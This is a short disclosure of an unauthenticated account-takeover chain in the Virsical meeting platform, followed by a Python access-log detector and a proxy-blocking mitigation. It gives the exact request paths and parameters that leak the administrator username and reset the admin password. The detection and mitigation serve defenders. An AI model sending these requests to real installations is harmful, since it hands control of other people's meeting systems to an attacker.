virsical meeting platform 0day exploit

2021/10/12

bug description

Two unauthenticated interfaces, chained together, lead to administrator account takeover.

exploit detail

  1. Call unauthenticated interface 1, /smartmeeting/smart/third/deleteRoom?roomId=618, to obtain the administrator's username.

  2. Call unauthenticated interface 2, /iwork/userInfo/updatePwd?userId=sysadmin&pwd=xxxxxx, to change the administrator's password (the new password is base64 encoded).

  3. Log in to the meeting management panel with the new password.
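Defenders can spot the chain above in web server access logs: the two endpoints should never be reached without a session, and a source hitting deleteRoom and then updatePwd in quick succession is the takeover pattern itself. The following detector is an added example, not part of the original write-up; the log lines are constructed in combined log format and the five-minute window is an assumed tuning value.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access log (combined log format); not from any real system.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Oct/2021:10:01:02 +0000] "GET /smartmeeting/smart/third/deleteRoom?roomId=618 HTTP/1.1" 200 212 "-" "curl/7.68.0"
203.0.113.7 - - [12/Oct/2021:10:01:09 +0000] "GET /iwork/userInfo/updatePwd?userId=sysadmin&pwd=eHh4eHh4 HTTP/1.1" 200 35 "-" "curl/7.68.0"
198.51.100.4 - - [12/Oct/2021:10:05:00 +0000] "GET /iwork/login HTTP/1.1" 200 1034 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoints named in the write-up; any hit is worth an alert because they are unauthenticated.
SENSITIVE = {
    "/smartmeeting/smart/third/deleteRoom": "admin username disclosure via deleteRoom",
    "/iwork/userInfo/updatePwd": "password change via updatePwd",
}
CHAIN_WINDOW = timedelta(minutes=5)  # assumed window between the two steps of the chain

def parse(line):
    """Parse one combined-format log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path, _, query = m["path"].partition("?")
    return {"ip": m["ip"], "ts": ts, "path": path, "query": query, "status": int(m["status"])}

def detect(log_text):
    """Return alerts: one HIGH per sensitive endpoint hit, plus a CRITICAL alert when the
    same source calls deleteRoom and then updatePwd within CHAIN_WINDOW."""
    alerts = []
    last_enum = {}  # source ip -> timestamp of its most recent deleteRoom hit
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec or rec["path"] not in SENSITIVE:
            continue
        alerts.append(("HIGH", rec["ip"], SENSITIVE[rec["path"]]))
        if rec["path"].endswith("deleteRoom"):
            last_enum[rec["ip"]] = rec["ts"]
        elif rec["ip"] in last_enum and rec["ts"] - last_enum[rec["ip"]] <= CHAIN_WINDOW:
            params = dict(p.split("=", 1) for p in rec["query"].split("&") if "=" in p)
            target = params.get("userId", "?")
            alerts.append(("CRITICAL", rec["ip"], f"takeover chain: password reset for {target}"))
    return alerts
```

Until the vendor fix is applied, the same two paths can be blocked at the reverse proxy for requests without a valid session, and any CRITICAL alert should trigger an immediate password reset for the named account.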